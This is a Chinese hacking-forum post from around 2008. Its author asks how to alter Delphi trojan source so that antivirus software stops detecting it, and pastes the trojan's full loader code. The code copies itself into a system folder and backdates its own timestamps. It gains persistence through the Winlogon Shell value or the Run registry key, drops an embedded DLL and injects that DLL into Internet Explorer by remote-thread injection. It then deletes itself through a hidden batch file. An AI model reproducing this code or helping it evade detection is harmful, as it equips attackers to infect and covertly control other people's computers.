|
 
- 帖子
- 270
- 积分
- 733
- 威望
- 1168
- 金钱
- 874
- 在线时间
- 2 小时
  
|
[讨论]delphi如何修改木马源码免杀
议题作者:qqqqaz
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
想修改木马源码来免杀,打乱顺序,改版本,函数名?
通常server端我用nop 填充,client 端我改函数名,server端一个文件得容易改源码来免杀。
如果server端有dll文件已免杀,dll转res文件,加在main.dpr中,main 代码如下,请教如何修改才免杀,或者改其中得单元文件,还有鸽子代码也是同样的吗?:
program Main;
uses
windows,
RejoiceBase,
SysUtils2,
SysUtils,
tlhelp32,
Reg;
{$L 'SRT.obj'}
{$R RSRC.RES}
//const
var
{ ExeFiles: PChar='3885B37550B70C7A';
DLLFiles: PChar='39E145AC78292F80';
IEFiles: PChar ='A80D2686D0D48FB4446382AAE7FCCA8A';}
ExeFiles: PChar = 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
DLLFiles: PChar = 'LXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
IEFiles: PChar = 'HXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
PID: DWORD;
Process: DWORD;
DllAllpath: string;
StartInfo: TStartupInfo;
ProcInfo: TProcessInformation;
function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;
function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;
function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';
function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
//----------------修改文件时间函数
type
// indicates the file time to set, used by SetFileTimesHelper and SetDirTimesHelper
TFileTimes = (ftLastAccess, ftLastWrite, ftCreation);
function SetFileTimesHelper(const FileName: string; const DateTime: TDateTime; Times: TFileTimes): Boolean;
var
Handle: THandle;
FileTime: TFileTime;
SystemTime: TSystemTime;
begin
Result := False;
Handle := CreateFile(PChar(FileName), GENERIC_WRITE, FILE_SHARE_READ, nil,OPEN_EXISTING, 0, 0);
if Handle <> INVALID_HANDLE_VALUE then
try
//SysUtils.DateTimeToSystemTime(DateTimeToLocalDateTime(DateTime), SystemTime);
SysUtils.DateTimeToSystemTime(DateTime, SystemTime);
if Windows.SystemTimeToFileTime(SystemTime, FileTime) then
begin
case Times of
ftLastAccess:
Result := SetFileTime(Handle, nil, @FileTime, nil);
ftLastWrite:
Result := SetFileTime(Handle, nil, nil, @FileTime);
ftCreation:
Result := SetFileTime(Handle, @FileTime, nil, nil);
end;
end;
finally
CloseHandle(Handle);
end;
end;
function SetFileLastAccess(const FileName: string; const DateTime: TDateTime): Boolean;
begin
Result := SetFileTimesHelper(FileName, DateTime, ftLastAccess);
end;
function SetFileLastWrite(const FileName: string; const DateTime: TDateTime): Boolean;
begin
Result := SetFileTimesHelper(FileName, DateTime, ftLastWrite);
end;
function SetFileCreation(const FileName: string; const DateTime: TDateTime): Boolean;
begin
Result := SetFileTimesHelper(FileName, DateTime, ftCreation);
end;
//----------------修改文件时间函数
procedure ExtDelMe;
var
F: textfile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
BatchFileName := Gesy + 'Deleteme.bat';
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + ParamStr(0) + '"');
WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
WriteLn(F, 'del %0');
CloseFile(F);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
function RandomFilename(aFilename: string): string;
var
Path, Filename, Ext: string;
begin
Result := aFilename;
Path := ExtractFilepath(aFilename);
Ext := ExtractFileExt(aFilename);
Filename := ExtractFilename(aFilename);
if Length(Ext) > 0 then
Filename := Copy(Filename, 1, Length(Filename) - Length(Ext));
repeat
Result := Path + Filename + inttoStr(Random(9999)) + Ext;
until not FileExists(Result);
end;
function GetProcessID(sProcName: string): Integer;
var
hProcSnap: THandle;
pe32: TProcessEntry32;
begin
Result := -1;
hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
if hProcSnap = INVALID_HANDLE_VALUE then Exit;
pe32.dwSize := SizeOf(ProcessEntry32);
if Process32First(hProcSnap, pe32) = True then
while Process32Next(hProcSnap, pe32) = True do
begin
if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then
begin
Result := pe32.th32ProcessID;
break;
end;
end;
CloseHandle(hProcSnap);
end;
//插入进程
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
BytesWritten: DWORD;
Thread: DWORD;
ThreadID: DWORD;
Parameters: Pointer;
begin
Result := False;
Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
if Parameters = nil then Exit;
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
WaitForSingleObject(Thread, INFINITE);
xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
end;
var
isSetup: Bool;
SetupPathName: string;
begin
{ ExeFiles := pchar(DeCryptStr(ExeFiles,'bwindlovexiaohan'));
DLLFiles := PChar(DeCryptStr(DLLFiles,'bwindlovexiaohan'));
IEFiles := PChar(DeCryptStr(IEFiles,'bwindlovexiaohan')); }
SetupPathName := Gesy + ExeFiles;
if (CompareText(paramstr(0), SetupPathName) <> 0) then
begin
try
if FileExists(SetupPathName) then
begin
FilesetAttr(SetupPathName, 0);
DeleteFile(SetupPathName);
if FileExists(SetupPathName) then
begin
Halt;
Exit;
end;
end;
CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftCreation);
except
end;
isSetup := True;
if judgesys = 3 then
begin
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
end
else
begin
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
end;
if FindWindow('Rejoice_3.2', 'Windows IDE') = 0 then
begin
DllAllpath := Gesy + DLLFiles;
try
FilesetAttr(DllAllpath, 0);
DeleteFile(DllAllpath); {删除现有的DLL文件}
except
end;
if FileExists(DllAllpath) then {如果删除失败,则改名}
begin
DllAllpath := RandomFilename(DllAllpath);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
end;
if ExtractRes('dllfile', 'mydll', DllAllpath) then {生成新的DLL插入文件}
begin
if IEFiles = 'IEXPLORE.EXE' then
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
PID := GetProcessID(IEFiles);
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); {打开要潜入的进程}
FilesetAttr(DllAllpath, 0);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
InjectLibrary(Process, Pchar(DllAllpath));
end;
end;
if isSetup then
Begin
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
ExtDelMe;
end;
Halt;
end.
帖子24 精华0 积分68 阅读权限40 在线时间210 小时 注册时间2006-8-31 最后登录2007-5-11 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)
qqqqaz 
晶莹剔透§烈日灼然 |
|
发表于 2008-7-21 00:17
| 